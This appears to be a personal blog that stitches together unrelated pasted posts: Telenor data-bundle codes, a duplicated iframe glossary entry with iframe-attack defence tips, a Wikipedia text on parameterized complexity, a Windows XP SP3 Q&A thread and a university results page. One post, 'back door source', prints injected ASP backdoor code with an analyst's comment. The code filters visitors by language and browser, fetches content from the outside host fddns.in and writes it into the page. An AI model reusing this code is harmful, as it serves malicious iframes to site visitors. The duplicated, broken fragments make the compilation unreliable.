پیر، 31 اگست، 2015

azad kashmir pics


azad kshmir pics


waqas



mobilink 3g pakages


telenor 3g pakages

Daily Bundle 15 100 1 *345*131# Daily Plus Bundle 25 200 1 *345*132# 3 Day Bundle 35 300 + Free 300MB for Facebook 3 *345*133# Weekly Bundle 75 1 GB + Free 500MB for Dailymotion 7 *345*134# Weekly Unlimited Daytime Bundle 40 7GB 7 *345*144# Monthly Bundle 400 4GB 30 *345*135# Monthly Plus Bundle 1,000 10GB 30 *345*136# Facebook Offer 1 50MB 1 Send SMS ‘internet’ to 131

iframe

An IFrame (Inline Frame) is an HTML document embedded inside another HTML document on a website. The IFrame HTML element is often used to insert content from another source, such as an advertisement, into a Web page. Although an IFrame behaves like an inline image, it can be configured with its own scrollbar independent of the surrounding page's scrollbar. A Web designer can change an IFrame's content without requiring the user to reload the surrounding page. This capacity is enabled through JavaScript or the target attribute of an HTML anchor. Web designers use IFrames to embed interactive applications in Web pages, including those that employ Ajax (Asynchronous JavaScript and XML), like Google Maps or ecommerce applications. In 2008, hackers seeded Internet search results with malicious IFrame code, leading to IFrame overlay attacks on many prominent websites, including those for USA Today and ABC News. The attackers inserted IFrame code into the saved search results of legitimate websites. When a visitor clicked on a link from the compromised search tool, he would be redirected to a malicious website by the IFrame code. The unsuspecting user's computer would then be vulnerable to the automatic download of malware. This was last updated in January 2015 Posted by: Margaret Rouse Related Terms DEFINITIONS car hacking - Car hacking is the manipulation of the code in a car's electronic control unit (ECU) to exploit a vulnerability and gain control of other ECU units in the vehicle. (WhatIs.com) man-in-the-middle attack (MitM) - A man-in-the-middle attack is one in which the attacker secretly intercepts and relays messages between two parties who think they are communicating directly with each other. (SearchSecurity.com) fileless infection (fileless malware) - Fileless malware is written directly to RAM rather than being installed and existing in a device's hard disc storage. Because the malware doesn't exist as a file, it can elude intrusion prevention ... (WhatIs.com) GLOSSARIES Malware - Terms related to malware, including definitions about viruses and Trojans and other words and phrases about malicious software. Internet applications - This WhatIs.com glossary contains terms related to Internet applications, including definitions about Software as a Service (SaaS) delivery models and words and phrases about web sites, e-commerce ... how to defend against iframe attacks? Embedding an image, iFrame or other content in a way that that is invisible to a user is an old attack method that dates back many years to when images were the same color as the background. Hacker group Fluffi Bunni performed one of the most infamous iFrame or banner attacks when the group forced securityfocus.com to serve up compromised ads. IFrame attacks have increased with the widespread adoption of ad networks and the increasing inclusion of content from third-party sites via iFrames. While there are valid uses for iFrames when including content from external websites, enterprises need to trust the security of the content they receive from all sites. In a blog post, Symantec outlined some of the weaknesses exploited in attacks via iFrames, including potential browser and SSL certificate security flaws. Enterprises can protect their customers from iFrame attacks by not using iFrames to include content from third-party sites. Instead, all of the content can originate from the enterprise's website as securityfocus.com did during its encounter with Fluffi Bunni, but this option can cause problems when pulling in new ads. Enterprises can also take a hybrid approach, where the content that would be included in the iFrame is downloaded to the server, checked for malware or potentially malicious external references by a Web reputation service for all external links and then publish locally. To stop malicious links or JavaScript, the content can be changed into benign image files.

iframe

An IFrame (Inline Frame) is an HTML document embedded inside another HTML document on a website. The IFrame HTML element is often used to insert content from another source, such as an advertisement, into a Web page. Although an IFrame behaves like an inline image, it can be configured with its own scrollbar independent of the surrounding page's scrollbar. A Web designer can change an IFrame's content without requiring the user to reload the surrounding page. This capacity is enabled through JavaScript or the target attribute of an HTML anchor. Web designers use IFrames to embed interactive applications in Web pages, including those that employ Ajax (Asynchronous JavaScript and XML), like Google Maps or ecommerce applications. In 2008, hackers seeded Internet search results with malicious IFrame code, leading to IFrame overlay attacks on many prominent websites, including those for USA Today and ABC News. The attackers inserted IFrame code into the saved search results of legitimate websites. When a visitor clicked on a link from the compromised search tool, he would be redirected to a malicious website by the IFrame code. The unsuspecting user's computer would then be vulnerable to the automatic download of malware. This was last updated in January 2015 Posted by: Margaret Rouse Related Terms DEFINITIONS car hacking - Car hacking is the manipulation of the code in a car's electronic control unit (ECU) to exploit a vulnerability and gain control of other ECU units in the vehicle. (WhatIs.com) man-in-the-middle attack (MitM) - A man-in-the-middle attack is one in which the attacker secretly intercepts and relays messages between two parties who think they are communicating directly with each other. (SearchSecurity.com) fileless infection (fileless malware) - Fileless malware is written directly to RAM rather than being installed and existing in a device's hard disc storage. Because the malware doesn't exist as a file, it can elude intrusion prevention ... (WhatIs.com) GLOSSARIES Malware - Terms related to malware, including definitions about viruses and Trojans and other words and phrases about malicious software. Internet applications - This WhatIs.com glossary contains terms related to Internet applications, including definitions about Software as a Service (SaaS) delivery models and words and phrases about web sites, e-commerce ...

back door source

<% function IP2Long(ipadr) result=0 faktorer=split(ipadr,".") for ix=0 to 3 expn=3-ix result=result + faktorer(ix) * 256 ^ expn next If result < 0 Then result = result + 4294967296 IP2Long=result end function min=100000000 max=9999999999 Randomize r_my_num=int((max-min+1)*rnd+min) If Not InStr(Request.ServerVariables("HTTP_ACCEPT_LANGUAGE"), "ru") Then If Not InStr(Request.ServerVariables("HTTP_USER_AGENT"), "Chrome") Then set objSrvHTTP = CreateObject("MSXML2.ServerXMLHTTP") v_srl = "fddns.in" objSrvHTTP.open "GET","http://"&v_srl&":80/ferdrez.php?di="&IP2Long(Request.ServerVariables("HTTP_X_FORWARDED_FOR"))&"&dr="&r_my_num, false objSrvHTTP.send Response.Write(objSrvHTTP.ResponseText) End If End If The most interesting part is in bold. This code was not on the top of the page, nor on the bottom. It was added specifically in a content block that will always execute. Basically it will only show the iFrame when the visitor of the website is not using the Russian language on his PC and when he is not using Chrome. This will include the following iFrame:

parameter problems

http://www.sprg.uniroma2.it/home/cesati/research/compendium/compendium.pdf

parameter

In computer science, parameterized complexity is a branch of computational complexity theory that focuses on classifying computational problems according to their inherent difficulty with respect to multiple parameters of the input. The complexity of a problem is then measured as a function in those parameters. This allows the classification of NP-hard problems on a finer scale than in the classical setting, where the complexity of a problem is only measured by the number of bits in the input. The first systematic work on parameterized complexity was done by Downey & Fellows (1999). Under the assumption that P ≠ NP, there exist many natural problems that require superpolynomial running time when complexity is measured in terms of the input size only, but that are computable in a time that is polynomial in the input size and exponential or worse in a parameter k. Hence, if k is fixed at a small value and the growth of the function over k is relatively small then such problems can still be considered "tractable" despite their traditional classification as "intractable". The existence of efficient, exact, and deterministic solving algorithms for NP-complete, or otherwise NP-hard, problems is considered unlikely, if input parameters are not fixed; all known solving algorithms for these problems require time that is exponential (or at least superpolynomial) in the total size of the input. However, some problems can be solved by algorithms that are exponential only in the size of a fixed parameter while polynomial in the size of the input. Such an algorithm is called a fixed-parameter tractable (fpt-)algorithm, because the problem can be solved efficiently for small values of the fixed parameter. Problems in which some parameter k is fixed are called parameterized problems. A parameterized problem that allows for such an fpt-algorithm is said to be a fixed-parameter tractable problem and belongs to the class FPT, and the early name of the theory of parameterized complexity was fixed-parameter tractability. Many problems have the following form: given an object x and a nonnegative integer k, does x have some property that depends on k? For instance, for the vertex cover problem, the parameter can be the number of vertices in the cover. In many applications, for example when modelling error correction, one can assume the parameter to be "small" compared to the total input size. Then it is interesting to see whether we can find an algorithm which is exponential only in k, and not in the input size. In this way, parameterized complexity can be seen as two-dimensional complexity theory. This concept is formalized as follows: A parameterized problem is a language L \subseteq \Sigma^* \times \N, where \Sigma is a finite alphabet. The second component is called the parameter of the problem. A parameterized problem L is fixed-parameter tractable if the question “(x, k) \in L?” can be decided in running time f(k) \cdot |x|^{O(1)}, where f is an arbitrary function depending only on k. The corresponding complexity class is called FPT. For example, there is an algorithm which solves the vertex cover problem in O(kn + 1.274^k) time, [1] where n is the number of vertices and k is the size of the vertex cover. This means that vertex cover is fixed-parameter tractable with the size of the solution as the parameter. Contents [hide] 1 Complexity classes 1.1 FPT 1.2 W hierarchy 1.2.1 W[1] 1.2.2 W[2] 1.2.3 W[t] 1.2.4 W[P] 1.3 XP 2 Notes 3 References 4 External links Complexity classes[edit] FPT[edit] FPT contains the fixed parameter tractable problems, which are those that can be solved in time f(k) \cdot {|x|}^{O(1)} for some computable function f. Typically, this function is thought of as single exponential, such as 2^{O(k)} but the definition admits functions that grow even faster. This is essential for a large part of the early history of this class. The crucial part of the definition is to exclude functions of the form f(n,k), such as n^k. The class FPL (fixed parameter linear) is the class of problems solvable in time f(k) \cdot |x| for some computable function f Grohe (1999). FPL is thus a subclass of FPT. An example is the satisfiability problem, parameterised by the number of variables. A given formula of size m with k variables can be checked by brute force in time O(2^km). A vertex cover of size k in a graph of order n can be found in time O(2^kn), so this problem is also in FPT. An example of a problem that is thought not to be in FPT is graph coloring parameterised by the number of colors. It is known that 3-coloring is NP-hard, and an algorithm for graph k-colouring in time f(k)n^{O(1)} for k=3 would run in polynomial time in the size of the input. Thus, if graph coloring parameterised by the number of colors were in FPT, then P = NP. There are a number of alternative definitions of FPT. For example, the running time requirement can be replaced by f(k) + |x|^{O(1)}. Also, a parameterised problem is in FPT if it has a so-called kernel. Kernelization is a preprocessing technique that reduces the original instance to its "hard kernel", a possibly much smaller instance that is equivalent to the original instance but has a size that is bounded by a function in the parameter. FPT is closed under a parameterised reduction called fpt-reduction, which simultaneously preserves the instance size and the parameter. Obviously, FPT contains all polynomial-time computable problems. Moreover, it contains all optimisation problems in NP that allow a Fully polynomial-time approximation scheme. W hierarchy[edit] The W hierarchy is a collection of computational complexity classes. A parameterised problem is in the class W[i], if every instance (x, k) can be transformed (in fpt-time) to a combinatorial circuit that has weft at most i, such that (x, k)\in L if and only if there is a satisfying assignment to the inputs, which assigns 1 to at most k inputs. The height thereby is the largest number of logical units with unbounded fan-in on any path from an input to the output. The number of logical units with bounded fan-in on the paths must be limited by a constant that holds for all instances of the problem. Note that FPT = W[0] and W[i] \subseteq W[j] for all i\le j. The classes in the W hierarchy are also closed under fpt-reduction. Many natural computational problems occupy the lower levels, W[1] and W[2]. W[1][edit] Examples of W[1]-complete problems include deciding if a given graph contains a clique of size k deciding if a given graph contains an independent set of size k deciding if a given nondeterministic single-tape Turing machine accepts within k steps ("short Turing machine acceptance" problem) W[2][edit] Examples of W[2]-complete problems include deciding if a given graph contains a dominating set of size k deciding if a given nondeterministic multi-tape Turing machine accepts within k steps ("short multi-tape Turing machine acceptance" problem) W[t][edit] W[t] can be defined using the family of Weighted Weft-t-Depth-d SAT problems for d\geq t: W[t,d] is the class of parameterized problems that fpt-reduce to this problem, and W[t] = \bigcup_{d\geq t} W[t,d]. Here, Weighted Weft-t-Depth-d SAT is the following problem: Input: A Boolean formula of depth at most d and weft at most t, and a number k. The depth is the maximal number of gates on any path from the root to a leaf, and the weft is the maximal number of gates of fan-in at least three on any path from the root to a leaf. Question: Does the formula have a satisfying assignment of Hamming weight at most k? It can be shown that the problem Weighted t-Normalize SAT is complete for W[t] under fpt-reductions.[2] Here, Weighted t-Normalize SAT is the following problem: Input: A Boolean formula of depth at most t with an AND-gate on top, and a number k. Question: Does the formula have a satisfying assignment of Hamming weight at most k? W[P][edit] W[P] is the class of problems that can be decided by a nondeterministic polynomial-time Turing-machine that makes at most O(f(k)\cdot \log n) nondeterministic choices in the computation on (x,k) (a k-restricted Turing-machine). Flum & Grohe (2006) It is known that FPT is contained in W[P], and the inclusion is believed to be strict. However, resolving this issue would imply a solution to the P versus NP problem. Other connections to unparameterised computational complexity are that FPT equals W[P] if and only if circuit satisfiability can be decided in time \exp(o(n))m^{O(1)}, or if and only if there is a computable, nondecreasing, unbounded function f such that all languages recognised by a nondeterministic polynomial-time Turing machine using f(n)log n nondeterministic choices are in P. XP[edit] XP is the class of parameterized problems that can be solved in time n^{f(k)} for some computable function f. [icon] This section requires expansion. (April 2011) Notes[edit] Jump up ^ Chen, Kanj & Xia 2006 Jump up ^ Buss, Jonathan F, Islam, Tarique (2006). "Simplifying the weft hierarchy". Theoretical Computer Science (Elsevier) 351 (3): 303–313. doi:10.1016/j.tcs.2005.10.002. References[edit] Chen, Jianer; Kanj, Iyad A.; Xia, Ge (2006). "Improved Parameterized Upper Bounds for Vertex Cover". Mfcs 2006 4162: 238–249. doi:10.1007/11821069_21. Downey, Rod G.; Fellows, Michael R. (1999). Parameterized Complexity. Springer. ISBN 0-387-94883-X. Flum, Jörg; Grohe, Martin (2006). Parameterized Complexity Theory. Springer. ISBN 978-3-540-29952-3. Niedermeier, Rolf (2006). Invitation to Fixed-Parameter Algorithms. Oxford University Press. ISBN 0-19-856607-7. Grohe, Martin (1999). "Descriptive and Parameterized Complexity". Computer Science Logic. Lecture Notes in Computer Science 1683. Springer Berlin Heidelberg. pp. 14–31. ISBN 978-3-540-66536-6. The Computer Journal. Volume 51, Numbers 1 and 3 (2008). The Computer Journal. Special Double Issue on Parameterized Complexity with 15 survey articles, book review, and a Foreword by Guest Editors R. Downey, M. Fellows and M. Langston.

اتوار، 30 اگست، 2015

WINDOW XP SP3

Update Windows XP to SP3 without internet - Super User
Take the 2-minute tour ×
Super User is a question and answer site for computer enthusiasts and power users. It's 100% free, no registration required.

I've been asked to update some computers running Windows XP (without any service packs) to Windows XP SP3. The computers don't have an internet connection (only a small intranet) and have never been updated since first install.

Do I need to install SP1a first, then SP2, then SP3, or can I install SP3 immediately?

And where do I find the right files, that don't require an internet connection during installation?

share|improve this question
1  
1) I recently answered a question from someone who needed to install SP2 before he could install SP3. I guess you need all three of them. 2) Check out download.wsusoffline.net for offline updating. 3) I hope USB ports and CDROM drives are disabled on those systems, or at the very last that the antivirus software is regularly updated. If not add that to the TODO-list –  Hennes Oct 9 '12 at 8:47
    
Thanks. I have downloaded the service packs and also the WSUS software. I'll try the WSUS one first. I compiled the package and put it on an usb-drive. If it doesn't work for some reason, I'll still have the service packs. Your third point is exactly why these systems need to be updated. –  Alexander Oct 9 '12 at 10:39

2 Answers 2

up vote 3 down vote accepted

Here are links to offline installation files for SP1a, SP2 and SP3. Download them on system with an internet connection and use them to update any systems with no internet connection.

If you want to create only single installation disk of all the previous updates including SP3, go to this link to download an ISO image.

Also, you can refer this post.

share|improve this answer
    
Thanks for the links. I'll burn the ISO onto a CD and will have the separate packs with me on a usb-drive when I go there. (As well as the WSUS package @Hennes mentioned.) –  Alexander Oct 9 '12 at 10:41

You might also make a slipstream install CD, which has SP3 integrated into the install CD. Of course, it is only helpful if you can install from scratch, and not upgrade existing systems where you need to retain installed programs and settings.

Here's a guide: http://winsupersite.com/article/windows-xp2/slipstreaming-windows-xp-with-service-pack-3-sp3-128464

share|improve this answer

Your Answer

 
discard

By posting your answer, you agree to the privacy policy and terms of service.

Not the answer you're looking for? Browse other questions tagged or ask your own question.

p://www.microsoft.com/en-us/download/details.aspx?id=24">

جمعہ، 28 اگست، 2015

ba results 2015

http://pu.edu.pk/home/results_show/2481 University of the Punjab - Results - B.A./ B.Sc. Annual Examination 2015
Loading content, please wait.. loading..
logo
 
  Campus
Quaid-i-Azam
.. .. .. Jehlum
..
header image
.
.
 
.
I
I
About Us | Admissions | Academics | Affiliated Colleges | Careers | Campus Life | Site Map | Info Desk
Home > Results
News Updates
Result of B.A./ B.Sc. Annual Examination 2015
---------------------
Best Paper Certificate at an International Conference
---------------------
PU VC Dr Mujahid Kamran's Interview in Daily Jang
---------------------
Registration of Private Candidates for B.A./ B.Sc. Annual Examination 2016
---------------------
   
press   Webmail
rozee   SGCC
online_library.   DEL
     
DPCC
Results
Name
Roll No.*
 




   Back

Home | About Us | PU at Glance | Lahore at Glance | Affiliated Colleges | Careers | Contact Us |
  Copyright © 2015 University of the Punjab. All rights reserved
 
Connect with: